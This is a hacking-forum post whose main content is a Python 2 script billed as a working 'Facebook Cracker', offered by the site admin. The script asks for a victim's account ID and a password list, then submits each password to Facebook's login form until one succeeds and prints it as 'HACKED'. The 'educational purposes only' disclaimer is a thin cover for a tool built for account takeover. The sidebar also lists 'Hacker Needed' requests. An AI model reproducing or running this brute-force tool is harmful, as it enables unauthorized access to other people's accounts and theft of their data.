www.i4info.org

Would you like to react to this message? Create an account in a few clicks or log in to continue.
www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2017
Facebook Cracker [python] working EmptySat Apr 29, 2017 10:50 am by ubedullah

» Group hackers
Facebook Cracker [python] working EmptySat Apr 15, 2017 2:37 pm by Group Hackers

» Hacker Needed
Facebook Cracker [python] working EmptySat Apr 15, 2017 3:57 am by Group Hackers

» Hacker Needed
Facebook Cracker [python] working EmptySat Apr 15, 2017 1:45 am by Group Hackers

» Hacker Needed
Facebook Cracker [python] working EmptyThu Apr 13, 2017 11:10 pm by Group Hackers

» Hacker Needed
Facebook Cracker [python] working EmptyTue Apr 11, 2017 2:07 pm by Group Hackers

» Hacker Needed
Facebook Cracker [python] working EmptyTue Apr 11, 2017 2:21 am by Group Hackers

» Hacker Needed
Facebook Cracker [python] working EmptyTue Apr 11, 2017 2:06 am by Group Hackers

» Hacker Needed
Facebook Cracker [python] working EmptyTue Apr 11, 2017 1:35 am by Group Hackers

May 2024

MonTueWedThuFriSatSun
  12345
6789101112
13141516171819
20212223242526
2728293031  

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter


    Facebook Cracker [python] working

    Admin
    Admin
    Admin


    Posts : 474
    Reputation : 8
    Join date : 2014-12-10
    Age : 31
    Location : Pakistan

    Facebook Cracker [python] working Empty Facebook Cracker [python] working

    Post by Admin Sat Mar 14, 2015 7:37 am

    #!usr/bin/python

    #Facebook Cracker Version 2 can crack into Facebook Database 100% without Interruption By Facebook Firewall !

    #This program is for educational purposes only.

    #Don't attack people facebook accounts it's illegal !

    #If you want to crack into someone's account, you must have the permission of the user.

    #Mauritania Attacker is not responsible.

    import sys

    import random

    import mechanize

    import cookielib





    GHT = '''

    +=======================================+

    |..........Facebook Cracker v 3.........|

    +---------------------------------------+

    |#Author: shahroze |

    |#Contact: [You must be registered and logged in to see this link.] |

    |#Date: 01/01/2015 |

    |#this tools just for test |

    |#i dont' need the opportunity to hack |

    |i creat the opportunity , i'm shahroze |

    |#Respect C0d3rz |

    |# Email: [You must be registered and logged in to see this link.] |


    +=======================================+

    |..........Facebook Cracker v 3.........|

    +---------------------------------------+

    '''

    print "Note: - This tool can crack facebook account even if you don't have the email of your victim"

    print "# Hit CTRL+C to quit the program"

    print "# Use [You must be registered and logged in to see this link.] for more infos about your victim ^_^"





    email = str(raw_input("# id of victime : "))

    passwordlist = str(raw_input("xD : "))



    useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]







    login = 'https://www.facebook.com/login.php?login_attempt=1'

    def attack(password):



    try:

    sys.stdout.write("\r[*] trying %s.. " % password)

    sys.stdout.flush()

    br.addheaders = [('User-agent', random.choice(useragents))]

    site = br.open(login)

    br.select_form(nr=0)





    ##Facebook

    br.form['email'] =email

    br.form['pass'] = password

    br.submit()

    log = br.geturl()

    if log != login:

    print "\n\n\n[*] account HACKED BY isdo213 .. !!"

    print "\n[*] Password : %s\n" % (password)

    sys.exit(1)

    except KeyboardInterrupt:

    print "\n[*] Exiting program .. "

    sys.exit(1)



    def search():

    global password

    for password in passwords:

    attack(password.replace("\n",""))







    def check():



    global br

    global passwords

    try:

    br = mechanize.Browser()

    cj = cookielib.LWPCookieJar()

    br.set_handle_robots(False)

    br.set_handle_equiv(True)

    br.set_handle_referer(True)

    br.set_handle_redirect(True)

    br.set_cookiejar(cj)

    br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

    except KeyboardInterrupt:

    print "\n[*] Exiting program ..\n"

    sys.exit(1)

    try:

    list = open(passwordlist, "r")

    passwords = list.readlines()

    k = 0

    while k < len(passwords):

    passwords[k] = passwords[k].strip()

    k += 1

    except IOError:

    print "\n[*] Error: check your password list path \n"

    sys.exit(1)

    except KeyboardInterrupt:

    print "\n[*] Exiting program ..\n"

    sys.exit(1)

    try:

    print GHT

    print "[*] Account to crack : %s" % (email)

    print "[*] Loaded :" , len(passwords), "passwords"

    print "[*] Cracking, please wait ..."

    except KeyboardInterrupt:

    print "\n[*] Exiting program ..\n"

    sys.exit(1)

    try:

    search()

    attack(password)

    except KeyboardInterrupt:

    print "\n[*] Exiting program ..\n"

    sys.exit(1)



    if __name__ == '__main__':

    check()

      Current date/time is Sat May 11, 2024 11:52 am